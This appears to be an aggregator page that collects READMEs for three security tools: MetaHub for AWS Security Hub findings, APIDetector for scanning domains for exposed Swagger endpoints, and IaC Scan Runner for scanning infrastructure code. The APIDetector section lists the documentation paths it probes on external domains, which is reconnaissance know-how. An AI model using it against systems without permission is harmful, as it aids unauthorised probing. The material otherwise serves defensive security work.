docker run -ti metahub ./metahub -h

Run with Lambda

MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.

Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.

Terraform code is provided for deploying the Lambda function and all its dependencies.

Lambda use-cases

  • Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
  • Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
  • Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
  • Trigger the MetaHub Lambda function to create a ticket with enriched context.

Deploying Lambda

The terraform code for deploying the Lambda function is provided under the terraform/ folder.

Just run the following commands:

cd terraform
terraform init
terraform apply

The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.

Customize Lambda behaviour

You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.

Lambda Permissions

Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume by adding the option --mh-assume-role in the Lambda function configuration (see the previous step) and adding the corresponding policy to the Lambda role so that it is allowed to assume that role.

Run with Security Hub Custom Action

MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.


The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings, which means that it will update your findings back with MetaHub outputs. If you want to change this, see Customize Lambda behaviour.

You first need to create the Lambda function and then create the custom action in Security Hub.

For creating the lambda function, follow the instructions in the Run with Lambda section.

For creating the AWS Security Hub custom action:

  1. In Security Hub, choose Settings and then choose Custom Actions.
  2. Choose Create custom action.
  3. Provide a Name, Description, and Custom action ID for the action.
  4. Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
  5. In EventBridge, choose Rules and then choose Create rule.
  6. Enter a name and description for the rule.
  7. For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
  8. For Rule type, choose a rule with an event pattern and then press Next.
  9. For Event source, choose AWS events.
  10. For the Creation method, choose Use pattern form.
  11. For Event source, choose AWS services.
  12. For AWS service, choose Security Hub.
  13. For Event type, choose Security Hub Findings - Custom Action.
  14. Choose Specific custom action ARNs and add a custom action ARN.
  15. Choose Next.
  16. Under Select targets, choose the Lambda function
  17. Select the Lambda function you created for MetaHub.

AWS Authentication

  • Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).

For example, you can use the aws configure option.

aws configure

Or you can export your credentials to the environment.

export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID="ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY="XXXXXXXXX"
export AWS_SESSION_TOKEN="XXXXXXXXX"

Configuring Security Hub

  • If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in to. Just use the options --sh-assume-role to specify the role and --sh-account with the same AWS Account ID where you are logged in.

  • --sh-region: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together.

  • --sh-account and --sh-assume-role: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running or when running AWS Security Hub in a multiple AWS Account setup. Both options must be used together. The role provided needs to have enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify a --sh-account, MetaHub will assume the one you are logged in to.

  • --sh-profile: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify --sh-account or --sh-assume-role as MetaHub will use the credentials from the profile. If you are using --sh-account and --sh-assume-role, those options take precedence over --sh-profile.

IAM Policy for Security Hub

This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings action.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "securityhub:GetFindings",
        "securityhub:ListFindingAggregators",
        "securityhub:BatchUpdateFindings",
        "iam:ListAccountAliases"
      ],
      "Resource": [
        "*"
      ]
    }
  ]
}

Configuring Context

If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries because the affected resources are not in the same AWS Account as the AWS Security Hub findings. The --mh-assume-role option will be used to connect with the affected resources directly in the affected account. This role needs enough permissions to be able to describe resources.

IAM Policy for Context

The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit and the following actions:

  • tag:GetResources
  • lambda:GetFunction
  • lambda:GetFunctionUrlConfig
  • cloudtrail:LookupEvents
  • account:GetAlternateContact
  • organizations:DescribeAccount
  • iam:ListAccountAliases
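
The managed SecurityAudit policy is attached separately; as a sketch, the additional actions listed above could be granted with a statement like the following (the wildcard resource is for illustration only and should be narrowed to fit your environment):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "tag:GetResources",
        "lambda:GetFunction",
        "lambda:GetFunctionUrlConfig",
        "cloudtrail:LookupEvents",
        "account:GetAlternateContact",
        "organizations:DescribeAccount",
        "iam:ListAccountAliases"
      ],
      "Resource": "*"
    }
  ]
}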

Examples

Inputs

MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.

If you want to read from an input ASFF file, you need to use the options:

./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff

You can also combine AWS Security Hub findings with input ASFF files by specifying both inputs:

./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff

When using a file as input, you can't use the option --sh-filters for filtering findings, as this option relies on the AWS API for filtering. You also can't use the options --update-findings or --enrich-findings, as those findings are not in AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.
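
For reference, ASFF is a JSON format; a heavily trimmed sketch of a single finding is shown below (placeholder values, real findings carry more fields, and the exact file layout accepted by the file-asff input is defined by MetaHub itself):

[
  {
    "SchemaVersion": "2018-10-08",
    "Id": "example-finding-001",
    "ProductArn": "arn:aws:securityhub:eu-west-1:111122223333:product/111122223333/default",
    "GeneratorId": "example-generator",
    "AwsAccountId": "111122223333",
    "Types": ["Software and Configuration Checks"],
    "CreatedAt": "2024-01-01T00:00:00Z",
    "UpdatedAt": "2024-01-01T00:00:00Z",
    "Severity": {"Label": "HIGH"},
    "Title": "Example finding title",
    "Description": "Example finding description",
    "Resources": [
      {
        "Type": "AwsEc2SecurityGroup",
        "Id": "arn:aws:ec2:eu-west-1:111122223333:security-group/sg-01234567890"
      }
    ]
  }
]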

Output Modes

MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short, json-full, json-statistics, json-inventory, html, csv, and xlsx.

The outputs will be saved in the outputs/ folder with the execution date.

If you want only to generate a specific output mode, you can use the option --output-modes with the desired output mode.

For example, if you only want to generate the output json-short, you can use:

./metahub.py --output-modes json-short

If you want to generate json-short, json-full and html outputs, you can use:

./metahub.py --output-modes json-short json-full html

JSON

JSON-Short

Show all finding titles together under each affected resource, along with the AwsAccountId, Region, and ResourceType:

JSON-Full

Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel, Workflow, RecordState, Compliance, Id, and ProductArn:

JSON-Inventory

Show a list of all resources with their ARN.

JSON-Statistics

Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.

HTML

You can create rich HTML reports of your findings, adding your context as part of them.

HTML Reports are interactive in many ways:

  • You can add/remove columns.
  • You can sort and filter by any column.
  • You can auto-filter by any column.
  • You can group/ungroup findings.
  • You can also download that data to xlsx, CSV, HTML, and JSON.


CSV

You can create CSV reports of your findings, adding your context as part of them.


XLSX

Similar to CSV but with more formatting options.


Customize HTML, CSV or XLSX outputs

You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns and --output-config-columns (as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).

For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using:

./metahub --output-modes html --output-tag-columns Owner Environment

Filters

You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.

Security Hub Filtering

MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE using the option --sh-filters, the same way you would filter using the AWS CLI, but limited to the EQUALS comparison. If you want another comparison, use the option --sh-template (see Security Hub Filtering using YAML templates).

You can check available filters in AWS Documentation

./metahub --sh-filters <KEY=VALUE>

If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW

Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL

If a value contains spaces, you should specify it using double quotes: ProductName="Security Hub"

You can add how many different filters you need to your query and also add the same filter key with different values:

Examples:

  • Filter by Severity (CRITICAL):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
  • Filter by Severity (CRITICAL and HIGH):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
  • Filter by Severity and AWS Account:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
  • Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
  • Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
  • Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
  • Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:securityhub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
  • Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED

Security Hub Filtering using YAML templates

MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub, like EQUALS, PREFIX, NOT_EQUALS, or PREFIX_NOT_EQUALS. You can call your YAML file using the option --sh-template <FILE>.

You can find examples under the folder templates

  • Filter using YAML template default.yml:
./metahub --sh-template templates/default.yml
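
The exact schema is defined by the template files shipped under templates/; as an illustrative sketch only, assuming the templates mirror the AWS Security Hub GetFindings filter structure, a template might look like this:

SeverityLabel:
  - Value: CRITICAL
    Comparison: EQUALS
RecordState:
  - Value: ACTIVE
    Comparison: EQUALS
WorkflowStatus:
  - Value: NEW
    Comparison: EQUALS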

Config Filters

MetaHub supports Config filters (and associations) using KEY=VALUE where the value can only be True or False using the option --mh-filters-config. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.

Config filters only support True or False values:

  • A Config filter set to True means True or with data.
  • A Config filter set to False means False or without data.

Config filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Context for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-config, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are associated to Network Interfaces (network_interfaces=True):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
  • Get all S3 Buckets (ResourceType=AwsS3Bucket) only if they are public (public=True):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=True

Tags Filters

MetaHub supports Tags filters in the form of KEY=VALUE where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.

Tags filters run after AWS Security Hub filters:

  1. MetaHub fetches AWS Security Findings based on the filters you specified using --sh-filters (or the default ones).
  2. MetaHub executes Tags for the AWS-affected resources based on the previous list of findings
  3. MetaHub only shows you the resources that match your --mh-filters-tags, so it's a subset of the resources from point 1.

Examples:

  • Get all Security Groups (ResourceType=AwsEc2SecurityGroup) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW) only if they are tagged with a tag Environment and value Production:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production

Updating Workflow Status

You can use MetaHub to update the workflow status (NOTIFIED, NEW, RESOLVED, SUPPRESSED) of your AWS Security Hub findings with a single command. You use the --update-findings option to update all the findings returned by your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. The AWS Security Hub API is limited to 100 findings per update; MetaHub will split your results into chunks of 100 items to avoid this limitation and update your findings regardless of the amount.
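
The 100-finding limit can be illustrated with a minimal boto3 sketch (this is not MetaHub's actual implementation; the function name and the UpdatedBy value are arbitrary):

import boto3

def update_workflow_status(finding_identifiers, status, note):
    # finding_identifiers is a list of {"Id": ..., "ProductArn": ...} dicts.
    securityhub = boto3.client("securityhub")
    for i in range(0, len(finding_identifiers), 100):
        chunk = finding_identifiers[i:i + 100]  # BatchUpdateFindings accepts at most 100 findings
        securityhub.batch_update_findings(
            FindingIdentifiers=chunk,
            Workflow={"Status": status},  # e.g. "NOTIFIED"
            Note={"Text": note, "UpdatedBy": "metahub"},
        )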

For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW I found two affected resources with three findings each, making six Security Hub findings in total.

Running the following update command will update those six findings' workflow status to NOTIFIED with a Note:

./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."




The --update-findings will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Enriching Findings

You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields field for this.

By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.

For example, you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW, RecordState=ACTIVE, and ResourceType=AwsS3Bucket that are public=True with Context outputs:

./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-config public=True --enrich-findings



The --enrich-findings will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation.

Findings Aggregation

Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.

Shadowing is when two checks refer to the same issue, but one in a more generic way than the other one.

Duplication is when you use more than one scanner and get the same problem from more than one of them.

Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.

If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices, you will get two findings for the same issue:

  • EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
  • EC2.19 Security groups should not allow unrestricted access to ports with high risk

If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:

  • 4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389

Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!

  • EC2.22 Unused EC2 security groups should be removed

So now you have in your dashboard four findings for one resource!

Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.

MetaHub aggregates security findings under the affected resource.

This is how MetaHub shows the previous example with output-mode json-short:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

This is how MetaHub shows the previous example with output-mode json-full:

"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}

Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.

You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update the Workflow Status of these four findings using only one command: see Updating Workflow Status.

Contributing

You can follow this guide if you want to contribute to the Context module.



APIDetector - Efficiently Scan For Exposed Swagger Endpoints Across Web Domains And Subdomains

By: Zion3R


APIDetector is a powerful and efficient tool designed for testing exposed Swagger endpoints in various subdomains with unique smart capabilities to detect false-positives. It's particularly useful for security professionals and developers who are engaged in API testing and vulnerability scanning.


Features

  • Flexible Input: Accepts a single domain or a list of subdomains from a file.
  • Multiple Protocols: Option to test endpoints over both HTTP and HTTPS.
  • Concurrency: Utilizes multi-threading for faster scanning.
  • Customizable Output: Save results to a file or print to stdout.
  • Verbose and Quiet Modes: Default verbose mode for detailed logs, with an option for quiet mode.
  • Custom User-Agent: Ability to specify a custom User-Agent for requests.
  • Smart Detection of False-Positives: Ability to detect most false-positives.

Getting Started

Prerequisites

Before running APIDetector, ensure you have Python 3.x and pip installed on your system. You can download Python here.

Installation

Clone the APIDetector repository to your local machine using:

git clone https://github.com/brinhosa/apidetector.git
cd apidetector
pip install requests

Usage

Run APIDetector using the command line. Here are some usage examples:

  • Common usage: scan a list of subdomains with 30 threads, using a Chrome user-agent, and save the results in a file:

    python apidetector.py -i list_of_company_subdomains.txt -o results_file.txt -t 30 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
  • To scan a single domain:

    python apidetector.py -d example.com
  • To scan multiple domains from a file:

    python apidetector.py -i input_file.txt
  • To specify an output file:

    python apidetector.py -i input_file.txt -o output_file.txt
  • To use a specific number of threads:

    python apidetector.py -i input_file.txt -t 20
  • To scan with both HTTP and HTTPS protocols:

    python apidetector.py -m -d example.com
  • To run the script in quiet mode (suppress verbose output):

    python apidetector.py -q -d example.com
  • To run the script with a custom user-agent:

    python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"

Options

  • -d, --domain: Single domain to test.
  • -i, --input: Input file containing subdomains to test.
  • -o, --output: Output file to write valid URLs to.
  • -t, --threads: Number of threads to use for scanning (default is 10).
  • -m, --mixed-mode: Test both HTTP and HTTPS protocols.
  • -q, --quiet: Disable verbose output (default mode is verbose).
  • -ua, --user-agent: Custom User-Agent string for requests.

Risk Details of Each Endpoint APIDetector Finds

Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list of the endpoints APIDetector scans, based on potential risk levels, with similar endpoints grouped together:

1. High-Risk Endpoints (Direct API Documentation):

  • Endpoints:
    • '/swagger-ui.html', '/swagger-ui/', '/swagger-ui/index.html', '/api/swagger-ui.html', '/documentation/swagger-ui.html', '/swagger/index.html', '/api/docs', '/docs', '/api/swagger-ui', '/documentation/swagger-ui'
  • Risk:
    • These endpoints typically serve the Swagger UI interface, which provides a complete overview of all API endpoints, including request formats, query parameters, and sometimes even example requests and responses.
    • Risk Level: High. Exposing these gives potential attackers detailed insights into your API structure and potential attack vectors.

2. Medium-High Risk Endpoints (API Schema/Specification):

  • Endpoints:
    • '/openapi.json', '/swagger.json', '/api/swagger.json', '/swagger.yaml', '/swagger.yml', '/api/swagger.yaml', '/api/swagger.yml', '/api.json', '/api.yaml', '/api.yml', '/documentation/swagger.json', '/documentation/swagger.yaml', '/documentation/swagger.yml'
  • Risk:
    • These endpoints provide raw Swagger/OpenAPI specification files. They contain detailed information about the API endpoints, including paths, parameters, and sometimes authentication methods.
    • Risk Level: Medium-High. While they require more interpretation than the UI interfaces, they still reveal extensive information about the API.

3. Medium Risk Endpoints (API Documentation Versions):

  • Endpoints:
    • '/v2/api-docs', '/v3/api-docs', '/api/v2/swagger.json', '/api/v3/swagger.json', '/api/v1/documentation', '/api/v2/documentation', '/api/v3/documentation', '/api/v1/api-docs', '/api/v2/api-docs', '/api/v3/api-docs', '/swagger/v2/api-docs', '/swagger/v3/api-docs', '/swagger-ui.html/v2/api-docs', '/swagger-ui.html/v3/api-docs', '/api/swagger/v2/api-docs', '/api/swagger/v3/api-docs'
  • Risk:
    • These endpoints often refer to version-specific documentation or API descriptions. They reveal information about the API's structure and capabilities, which could aid an attacker in understanding the API's functionality and potential weaknesses.
    • Risk Level: Medium. These might not be as detailed as the complete documentation or schema files, but they still provide useful information for attackers.

4. Lower Risk Endpoints (Configuration and Resources):

  • Endpoints:
    • '/swagger-resources', '/swagger-resources/configuration/ui', '/swagger-resources/configuration/security', '/api/swagger-resources', '/api.html'
  • Risk:
    • These endpoints often provide auxiliary information, configuration details, or resources related to the API documentation setup.
    • Risk Level: Lower. They may not directly reveal API endpoint details but can give insights into the configuration and setup of the API documentation.

Summary:

  • Highest Risk: Directly exposing interactive API documentation interfaces.
  • Medium-High Risk: Exposing raw API schema/specification files.
  • Medium Risk: Version-specific API documentation.
  • Lower Risk: Configuration and resource files for API documentation.

Recommendations:

  • Access Control: Ensure that these endpoints are not publicly accessible or are at least protected by authentication mechanisms.
  • Environment-Specific Exposure: Consider exposing detailed API documentation only in development or staging environments, not in production.
  • Monitoring and Logging: Monitor access to these endpoints and set up alerts for unusual access patterns.

Contributing

Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.

Legal Disclaimer

The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.

License

This project is licensed under the MIT License.

Acknowledgments



Iac-Scan-Runner - Service That Scans Your Infrastructure As Code For Common Vulnerabilities

By: Zion3R


Service that scans your Infrastructure as Code for common vulnerabilities.

Aspect Information
Tool name IaC Scan Runner
Docker image xscanner/runner
PyPI package iac-scan-runner
Documentation docs
Contact us xopera@xlab.si

Purpose and description

The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) packages and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.

Running

This section explains how to run the REST API.

Run with Docker

You can run the REST API using a public xscanner/runner Docker image as follows:

# run IaC Scan Runner REST API in a Docker container and 
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 xscanner/runner

Or you can build the image locally and run it as follows:

# build Docker container (it will take some time) 
$ docker build -t iac-scan-runner .
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner

Run from CLI

To run using the IaC Scan Runner CLI:

# install the CLI
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install iac-scan-runner
# print OpenAPI specification
(.venv) $ iac-scan-runner openapi
# install prerequisites
(.venv) $ iac-scan-runner install
# run IaC Scan Runner REST API
(.venv) $ iac-scan-runner run

Run from source

To run locally from source:

# Export env variables 
export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
export SCAN_PERSISTENCE=enabled
export USER_MANAGEMENT=enabled

# Setup MongoDB
$ docker run --name mongodb -p 27017:27017 mongo

# install prerequisites
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install -r requirements.txt
(.venv) $ ./install-checks.sh
# run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
(.venv) $ uvicorn src.iac_scan_runner.api:app

Usage and examples

This part will show one of the possible deployments and short examples on how to use API calls.

First, we will clone the IaC Scan Runner repository and run the API.

$ git clone https://github.com/xlab-si/iac-scan-runner.git
$ docker compose up

After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.

  1. Let's create a project named test.
curl -X 'POST' \
'http://0.0.0.0:8000/project?creator_id=test' \
-H 'accept: application/json' \
-d ''

A project id will be returned to us. For this example, the project id is 1e7b2a91-2896-40fd-8d53-83db56088026.

  2. For example, let's say we want to initiate all checks except ansible-lint. Let's disable it.
curl -X 'PUT' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' \
-H 'accept: application/json'
  3. Now that the project is configured, we can simply choose the files that we want to scan and zip them. For IaC-Scan-Runner to work, files are expected to be compressed archives (usually zip files). In this case the response type will be json, but it is possible to change it to html. Please change YOUR.zip to the path of your file.
curl -X 'POST' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' \
-H 'accept: application/json' \
-H 'Content-Type: multipart/form-data' \
-F 'iac=@YOUR.zip;type=application/zip'

That is it.

Extending the scan workflow with new check tools

At a certain point, it might be required to include new check tools within the scan workflow, with the aim of providing wider coverage of IaC standards and project types. Therefore, this subsection identifies and describes the sequence of steps required for that purpose. For now, the steps have to be performed manually as described below, but it is planned to automate this procedure in the future via the API and to provide a user-friendly interface that will aid the user when importing new tools into the catalogue of available checks that make up the scan workflow. The following steps have to be taken in order to extend the scan workflow with a new tool.

Step 1 – Adding a tool-specific class to the checks directory

First, it is required to add a new tool-specific Python class to the checks directory inside IaC Scan Runner's source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py
The class of a new tool inherits the existing Check class, which provides a generalization of scan workflow tools. Moreover, it is necessary to provide implementations of the following methods:

  1. def configure(self, config_filename: Optional[str], secret: Optional[SecretStr])
  2. def run(self, directory: str)

While the first one aims to provide the necessary tool-specific parameters in order to set it up (such as passwords, client IDs, and tokens), the second one specifies how the tool itself is invoked via API or CLI and how its raw output is returned. A minimal sketch of such a class is shown below.
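
The following is a minimal, illustrative sketch only, not code from the project: the import path of the Check base class, its constructor arguments, and the exact return type expected from run are assumptions here, so adapt them to the real base class when adding your tool.

# iac-scan-runner/src/iac_scan_runner/checks/new_tool.py (illustrative sketch)
import subprocess
from typing import Optional

from pydantic import SecretStr

from iac_scan_runner.checks.check import Check  # assumed module path for the base class


class NewToolCheck(Check):
    def __init__(self):
        super().__init__("new_tool")  # assumption: the base class takes the check name

    def configure(self, config_filename: Optional[str], secret: Optional[SecretStr]):
        # Store tool-specific parameters such as passwords, client ids and tokens.
        self.config_filename = config_filename
        self.secret = secret

    def run(self, directory: str):
        # Invoke the tool via CLI against the unpacked IaC directory and return its raw output.
        result = subprocess.run(["new_tool", directory], capture_output=True, text=True)
        return result.stdout + result.stderr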

Step 2 – Adding the check tool class instance within the ScanRunner constructor

Once the new class derived from Check is added to the IaC Scan Runner's source code, it is also required to modify the source code of its main class, called ScanRunner. First, import the tool-specific class, then create a new check tool-specific class instance, and finally add it to the dictionary of IaC checks inside def init_checks(self).

A. Importing the check tool class:

    from iac_scan_runner.checks.new_tool import NewToolCheck

B. Creating a new instance of the check tool object inside init_checks:

    """Initiate predefined check objects"""
    new_tool = NewToolCheck()

